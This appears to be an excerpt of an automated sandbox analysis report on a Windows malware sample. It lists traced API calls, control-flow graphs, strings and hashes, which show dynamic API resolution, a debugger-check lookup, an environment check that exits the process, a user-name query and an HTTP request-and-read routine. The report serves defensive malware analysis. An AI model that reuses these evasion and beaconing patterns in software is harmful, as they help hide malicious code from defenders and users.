                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                              Strings
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                              • API String ID: 2127927946-2218711628
                                              • Opcode ID: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                                              • Instruction ID: 0478123035047c0a4e6da9b6409727c73bcdf1cfa19446a39dded10aa011e9d1
                                              • Opcode Fuzzy Hash: 7ec8420cb7fbb92e3b9dac634e6e561209ac50f0bb2ad10c25cf711909d82004
                                              • Instruction Fuzzy Hash: C041BB79740624EBC7189FE5FC8DB987F60AB4C712BA0C062F90299190CBF9D5019B3D

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 752 419860-419874 call 419750 755 419a93-419af2 LoadLibraryA * 5 752->755 756 41987a-419a8e call 419780 GetProcAddress * 21 752->756 758 419af4-419b08 GetProcAddress 755->758 759 419b0d-419b14 755->759 756->755 758->759 761 419b46-419b4d 759->761 762 419b16-419b41 GetProcAddress * 2 759->762 763 419b68-419b6f 761->763 764 419b4f-419b63 GetProcAddress 761->764 762->761 765 419b71-419b84 GetProcAddress 763->765 766 419b89-419b90 763->766 764->763 765->766 767 419bc1-419bc2 766->767 768 419b92-419bbc GetProcAddress * 2 766->768 768->767
                                              APIs
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E20), ref: 004198A1
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E80), ref: 004198BA
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E38), ref: 004198D2
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E98), ref: 004198EA
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E08), ref: 00419903
                                              • GetProcAddress.KERNEL32(74DD0000,02BE5B80), ref: 0041991B
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2388), ref: 00419933
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2488), ref: 0041994C
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E50), ref: 00419964
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8E68), ref: 0041997C
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8DD8), ref: 00419995
                                              • GetProcAddress.KERNEL32(74DD0000,02BB8DF0), ref: 004199AD
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2228), ref: 004199C5
                                              • GetProcAddress.KERNEL32(74DD0000,02BE60E8), ref: 004199DE
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6130), ref: 004199F6
                                              • GetProcAddress.KERNEL32(74DD0000,02BB23C8), ref: 00419A0E
                                              • GetProcAddress.KERNEL32(74DD0000,02BE5F68), ref: 00419A27
                                              • GetProcAddress.KERNEL32(74DD0000,02BE5FB0), ref: 00419A3F
                                              • GetProcAddress.KERNEL32(74DD0000,02BB22E8), ref: 00419A57
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6160), ref: 00419A70
                                              • GetProcAddress.KERNEL32(74DD0000,02BB21C8), ref: 00419A88
                                              • LoadLibraryA.KERNEL32(02BE5EC0,?,00416A00), ref: 00419A9A
                                              • LoadLibraryA.KERNEL32(02BE5F98,?,00416A00), ref: 00419AAB
                                              • LoadLibraryA.KERNEL32(02BE60A0,?,00416A00), ref: 00419ABD
                                              • LoadLibraryA.KERNEL32(02BE60D0,?,00416A00), ref: 00419ACF
                                              • LoadLibraryA.KERNEL32(02BE5F38,?,00416A00), ref: 00419AE0
                                              • GetProcAddress.KERNEL32(75A70000,02BE6190), ref: 00419B02
                                              • GetProcAddress.KERNEL32(75290000,02BE6178), ref: 00419B23
                                              • GetProcAddress.KERNEL32(75290000,02BE5EA8), ref: 00419B3B
                                              • GetProcAddress.KERNEL32(75BD0000,02BE5FE0), ref: 00419B5D
                                              • GetProcAddress.KERNEL32(75450000,02BB2308), ref: 00419B7E
                                              • GetProcAddress.KERNEL32(76E90000,02BE5C80), ref: 00419B9F
                                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00419BB6
                                              Strings
                                              • NtQueryInformationProcess, xrefs: 00419BAA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: NtQueryInformationProcess
                                              • API String ID: 2238633743-2781105232
                                              • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                              • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                              • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                              • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
                                              • StrCmpCA.SHLWAPI(?,02BEB110), ref: 0040493A
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
                                              • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,02BEB0F0), ref: 00404DE8
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
                                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
                                              • InternetCloseHandle.WININET(00000000), ref: 00404EAD
                                              • InternetCloseHandle.WININET(00000000), ref: 00404EC5
                                              • HttpOpenRequestA.WININET(00000000,02BEB080,?,02BEA3E0,00000000,00000000,00400100,00000000), ref: 00404B15
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • InternetCloseHandle.WININET(00000000), ref: 00404ECF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                              • String ID: "$"$------$------$------
                                              • API String ID: 2402878923-2180234286
                                              • Opcode ID: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                              • Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
                                              • Opcode Fuzzy Hash: af53b45c7d1414e7dc20276c78a04a4b8699d49fd5fc4d623f408e49df179ce7
                                              • Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$AllocNameProcessUser
                                              • String ID:
                                              • API String ID: 1206570057-0
                                              • Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                              • Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
                                              • Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
                                              • Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2
                                              APIs
                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                              • ExitProcess.KERNEL32 ref: 0040117E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitInfoProcessSystem
                                              • String ID:
                                              • API String ID: 752954902-0
                                              • Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                              • Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
                                              • Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
                                              • Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 633 419c10-419c1a 634 419c20-41a031 GetProcAddress * 43 633->634 635 41a036-41a0ca LoadLibraryA * 8 633->635 634->635 636 41a146-41a14d 635->636 637 41a0cc-41a141 GetProcAddress * 5 635->637 638 41a153-41a211 GetProcAddress * 8 636->638 639 41a216-41a21d 636->639 637->636 638->639 640 41a298-41a29f 639->640 641 41a21f-41a293 GetProcAddress * 5 639->641 642 41a2a5-41a332 GetProcAddress * 6 640->642 643 41a337-41a33e 640->643 641->640 642->643 644 41a344-41a41a GetProcAddress * 9 643->644 645 41a41f-41a426 643->645 644->645 646 41a4a2-41a4a9 645->646 647 41a428-41a49d GetProcAddress * 5 645->647 648 41a4ab-41a4d7 GetProcAddress * 2 646->648 649 41a4dc-41a4e3 646->649 647->646 648->649 650 41a515-41a51c 649->650 651 41a4e5-41a510 GetProcAddress * 2 649->651 652 41a612-41a619 650->652 653 41a522-41a60d GetProcAddress * 10 650->653 651->650 654 41a61b-41a678 GetProcAddress * 4 652->654 655 41a67d-41a684 652->655 653->652 654->655 656 41a686-41a699 GetProcAddress 655->656 657 41a69e-41a6a5 655->657 656->657 658 41a6a7-41a703 GetProcAddress * 4 657->658 659 41a708-41a709 657->659 658->659
                                              APIs
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2348), ref: 00419C2D
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2428), ref: 00419C45
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6028), ref: 00419C5E
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6058), ref: 00419C76
                                              • GetProcAddress.KERNEL32(74DD0000,02BE60B8), ref: 00419C8E
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6100), ref: 00419CA7
                                              • GetProcAddress.KERNEL32(74DD0000,02BB5920), ref: 00419CBF
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6118), ref: 00419CD7
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6250), ref: 00419CF0
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6238), ref: 00419D08
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6268), ref: 00419D20
                                              • GetProcAddress.KERNEL32(74DD0000,02BB22C8), ref: 00419D39
                                              • GetProcAddress.KERNEL32(74DD0000,02BB22A8), ref: 00419D51
                                              • GetProcAddress.KERNEL32(74DD0000,02BB24C8), ref: 00419D69
                                              • GetProcAddress.KERNEL32(74DD0000,02BB24E8), ref: 00419D82
                                              • GetProcAddress.KERNEL32(74DD0000,02BE61A8), ref: 00419D9A
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6220), ref: 00419DB2
                                              • GetProcAddress.KERNEL32(74DD0000,02BB5740), ref: 00419DCB
                                              • GetProcAddress.KERNEL32(74DD0000,02BB23A8), ref: 00419DE3
                                              • GetProcAddress.KERNEL32(74DD0000,02BE61F0), ref: 00419DFB
                                              • GetProcAddress.KERNEL32(74DD0000,02BE61C0), ref: 00419E14
                                              • GetProcAddress.KERNEL32(74DD0000,02BE61D8), ref: 00419E2C
                                              • GetProcAddress.KERNEL32(74DD0000,02BE6208), ref: 00419E44
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2208), ref: 00419E5D
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8DB8), ref: 00419E75
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8C80), ref: 00419E8D
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8EA8), ref: 00419EA6
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8D40), ref: 00419EBE
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8C98), ref: 00419ED6
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8CB0), ref: 00419EEF
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8EC0), ref: 00419F07
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8D58), ref: 00419F1F
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8E60), ref: 00419F38
                                              • GetProcAddress.KERNEL32(74DD0000,02BB4B80), ref: 00419F50
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8ED8), ref: 00419F68
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8D88), ref: 00419F81
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2408), ref: 00419F99
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8CC8), ref: 00419FB1
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2508), ref: 00419FCA
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8D70), ref: 00419FE2
                                              • GetProcAddress.KERNEL32(74DD0000,02BE8CE0), ref: 00419FFA
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2448), ref: 0041A013
                                              • GetProcAddress.KERNEL32(74DD0000,02BB2548), ref: 0041A02B
                                              • LoadLibraryA.KERNEL32(02BE8F08,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A03D
                                              • LoadLibraryA.KERNEL32(02BE8C50,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A04E
                                              • LoadLibraryA.KERNEL32(02BE8CF8,?,00415CA3,?,00000034,00000064,00416600,?,0000002C,00000064,004165A0,?,00000030,00000064,Function_00015AD0,?), ref: 0041A060
